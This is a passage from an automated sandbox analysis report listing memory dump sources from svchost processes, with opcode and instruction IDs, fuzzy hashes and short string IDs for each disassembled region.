                                                                                                                  • Opcode Fuzzy Hash: 0317371ca1aa09b89fc3225f48f0acb769e78103c828b7e6569e30735bb4d2f7
                                                                                                                  • Instruction Fuzzy Hash: 93310961B1C9484FE798EB7CD45AB79B7C6EB99311F0445BEE04EC32A3DD549C028781
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 5fbd5149c68bfba6f0bf3e0281f5be170467448b590b3cbba1a35084051eceb6
                                                                                                                  • Instruction ID: 00399d5fb6d490d78910dd16fb98b259e1ebddad5fd8b03cd36bfb1799ac48e9
                                                                                                                  • Opcode Fuzzy Hash: 5fbd5149c68bfba6f0bf3e0281f5be170467448b590b3cbba1a35084051eceb6
                                                                                                                  • Instruction Fuzzy Hash: A521C752B18F454FF784B7B8981ABB97BD5EF95741F0842BAE00DC3292DE189C4143D2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 516fa31cbf3bfe4a142488fd1be26c0e803d09230c19742232228380442b6659
                                                                                                                  • Instruction ID: 31d816ec983938355d4cc8b2103e92f2a9fec25771732ecf3633715ad900d68e
                                                                                                                  • Opcode Fuzzy Hash: 516fa31cbf3bfe4a142488fd1be26c0e803d09230c19742232228380442b6659
                                                                                                                  • Instruction Fuzzy Hash: 15412562E19B4A8FE741E7BCD8658EDBBF1EF46220B4481B7C14ED71A3DE2854468390
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4331df647e6309beb3986d2533e0751eb32f1735d0e51706b1f919b482709137
                                                                                                                  • Instruction ID: c3dbc25af194c507f602ab85607ae362c23152913a3c41a8c720df411bab9401
                                                                                                                  • Opcode Fuzzy Hash: 4331df647e6309beb3986d2533e0751eb32f1735d0e51706b1f919b482709137
                                                                                                                  • Instruction Fuzzy Hash: 86915F71A0E7894FF341FB7884A58E9BFA1EF42204754C1BAC18EC72A7C928984DC7D5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  • Opcode Fuzzy Hash: a631616ead08d61e90ddc9d69dc7408a0699b6d92d197dfa6030aa54e11afada
                                                                                                                  • Instruction Fuzzy Hash: BAE0ED65B149198FEF80EBACD845BFCA2D2EB9C252F1041B7D60ED3292DE2898458391
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: 35f99e2ace41ce074c2b0b98f12de128129166694c2a60ef44cc0e4600863efb
                                                                                                                  • Instruction ID: d5c91f05b76464c72d58105a7361ec72163fb3c282973f1e76983b8aa5ff6483
                                                                                                                  • Opcode Fuzzy Hash: 35f99e2ace41ce074c2b0b98f12de128129166694c2a60ef44cc0e4600863efb
                                                                                                                  • Instruction Fuzzy Hash: C852D861B29A498FF794E778C459AB9F7D2EF89700F4445B9E00EC32D2DE29AC058781
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: a7a466e88b258251c6cde416e1a5638f69f74b51b496efadd2ea4e3dee4f5ee1
                                                                                                                  • Instruction ID: ea37c7db289c501239dbde0019165ae06d80bb7ad9d6fa480a6f6234ffcf7d1f
                                                                                                                  • Opcode Fuzzy Hash: a7a466e88b258251c6cde416e1a5638f69f74b51b496efadd2ea4e3dee4f5ee1
                                                                                                                  • Instruction Fuzzy Hash: 7C516551A0E6C54FE786A7788865A76BFE4DF97215B0844FBE0CDC71E3DD09480AC392
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :P_^$k:P
                                                                                                                  • API String ID: 0-1581145465
                                                                                                                  • Opcode ID: 7cc6019efb04eda0970e0475e13005f03201ffc937b125e1c761d96f4a73829d
                                                                                                                  • Instruction ID: e26fbe00e549f7e3e3522b8ace919076b90c638ab9e1bd8a1d813aad17a62bc0
                                                                                                                  • Opcode Fuzzy Hash: 7cc6019efb04eda0970e0475e13005f03201ffc937b125e1c761d96f4a73829d
                                                                                                                  • Instruction Fuzzy Hash: CE01A76B6092A14DE702B6BDF491CEDAF58DF4523570842B3D3C9CD163C61454CA83D5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: dbd8bc7f62b8555c717cde748fb99a40bfe9f1690ad2e737b927d164946074b0
                                                                                                                  • Instruction ID: 0ff98600374ae7bc0a44a589ab06756fbc71fb0565b70e215e82a109aa9b726c
                                                                                                                  • Opcode Fuzzy Hash: dbd8bc7f62b8555c717cde748fb99a40bfe9f1690ad2e737b927d164946074b0
                                                                                                                  • Instruction Fuzzy Hash: 0D31C461B1C9480FE798EB7CD46AA79B7C6EB99311F0445BAE04EC32A3DD249C428381
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 48f494d8df1e03adb266ea0aa2591dc8929ed32dabb128e05de30ac33ee4d442
                                                                                                                  • Instruction ID: 0e82cb5eb30abd0fd86cfea0211c02cd5e5476a03aac9efb880ce90e633cbdf1
                                                                                                                  • Opcode Fuzzy Hash: 48f494d8df1e03adb266ea0aa2591dc8929ed32dabb128e05de30ac33ee4d442
                                                                                                                  • Instruction Fuzzy Hash: 1A21A362A1CF454FF784B7B8981ABB97AD5EB95710F0882BAE00EC3292DD18AC454391
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cc61676aa679502a8c339c54b6ea55f72e46956509ffa0a7954002cc4bc516c8
                                                                                                                  • Instruction ID: e4b7a534363a0d963a8ea6e3d8c827b2be591abbdc23f3115326f6ec036132db
                                                                                                                  • Opcode Fuzzy Hash: cc61676aa679502a8c339c54b6ea55f72e46956509ffa0a7954002cc4bc516c8
                                                                                                                  • Instruction Fuzzy Hash: 8941E872D1974A8FF744E7ACE8658ED7FB0EF46220F4841B7D14ED61B2DE2858068390
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e5b30750176d051204cd09aad94c30769332de1e25b15188327617f0ada5d664
                                                                                                                  • Instruction ID: 8d8176768c20ed00f62e343707f262c0d5650eaf817bd88cdddfcad861197495
                                                                                                                  • Opcode Fuzzy Hash: e5b30750176d051204cd09aad94c30769332de1e25b15188327617f0ada5d664
                                                                                                                  • Instruction Fuzzy Hash: C3911D6290E7864FF301EB7CD465CE9BF61EF52304B1881BAC14EC73A7DA699409C791
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4288f5e6da07d37e0a6c58f975d34d2a90f9a3fdda72254f1ef044d85d5150e9
                                                                                                                  • Instruction ID: b96935157e969f8c0470a777e7b7df050e8d435076dad56dfaa4890d462fb0b0
                                                                                                                  • Opcode Fuzzy Hash: 4288f5e6da07d37e0a6c58f975d34d2a90f9a3fdda72254f1ef044d85d5150e9
                                                                                                                  • Instruction Fuzzy Hash: B8511662A0EA864FE356A73CD8669F57BD5DF87220B0940FBD08DC71A3DC19984783A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ee22147c1160f64aaa973bb77391a09e2d9550ea382ca634be8822bc2e0092d8
                                                                                                                  • Instruction ID: 4ec9d370932a6a4c16a11fa6ca7fe85a1234dbfac122ec07c5148b1ae40e8a32
                                                                                                                  • Opcode Fuzzy Hash: ee22147c1160f64aaa973bb77391a09e2d9550ea382ca634be8822bc2e0092d8
                                                                                                                  • Instruction Fuzzy Hash: D7410B6B60E5265EF600BABDF851DDE7F5CDF8623470882B7D249CB1A3C954608A83F0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1e96557f159432671b22be963dc586be56a9161a2a6651428c6a6790088e1cd9
                                                                                                                  • Instruction ID: f0381d3d951fc353a92117af130b5772312853addc9bc7e3695c4a2c44e8ebe1
                                                                                                                  • Opcode Fuzzy Hash: 1e96557f159432671b22be963dc586be56a9161a2a6651428c6a6790088e1cd9
                                                                                                                  • Instruction Fuzzy Hash: AE412675A18A4D9FFB44E7BCD451AEDBBA1EF89200F4485B6D00AC72A3CE28A445C790
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e36b79b50de5ed2a64f273e5e910e4bcefbf44a6cd6d3d357109446e786bb29a
                                                                                                                  • Instruction ID: 8cbb0e0265a05cd093b0259be66751d7675851f5f4d1ae46929e7be82eae7876
                                                                                                                  • Opcode Fuzzy Hash: e36b79b50de5ed2a64f273e5e910e4bcefbf44a6cd6d3d357109446e786bb29a
                                                                                                                  • Instruction Fuzzy Hash: 5B31A861A6974D5FE344E76CC0A5CA9FF71FF89300F8485A9D40BC33A6DE286900CB55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: add709683c7ced5c2b59c66595c63a08656167b414e1f07b24d0e53a41871b59
                                                                                                                  • Instruction ID: 2a0a3277c6fa0a6be45fd1f92c83dcfd634a178868c0d600c59ee3165e63d044
                                                                                                                  • Opcode Fuzzy Hash: add709683c7ced5c2b59c66595c63a08656167b414e1f07b24d0e53a41871b59
                                                                                                                  • Instruction Fuzzy Hash: B2017B8490DB814FF345A3385866C71BFF0CF97611B0845AAE4CDC60A7D80A995483D2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 632cbdf09896862180f42111d0b62347290bd5ecb9bd00ff976717f634b1b520
                                                                                                                  • Instruction ID: 1d55830f7f8db58417f7820ce9d4f17c569812a80972c619673aba3f457cd6bd
                                                                                                                  • Opcode Fuzzy Hash: 632cbdf09896862180f42111d0b62347290bd5ecb9bd00ff976717f634b1b520
                                                                                                                  • Instruction Fuzzy Hash: 1CE0ED61B149198FEF80EBACE845BFCB2D6EB9C211F1041B7E50ED3292DE2898418391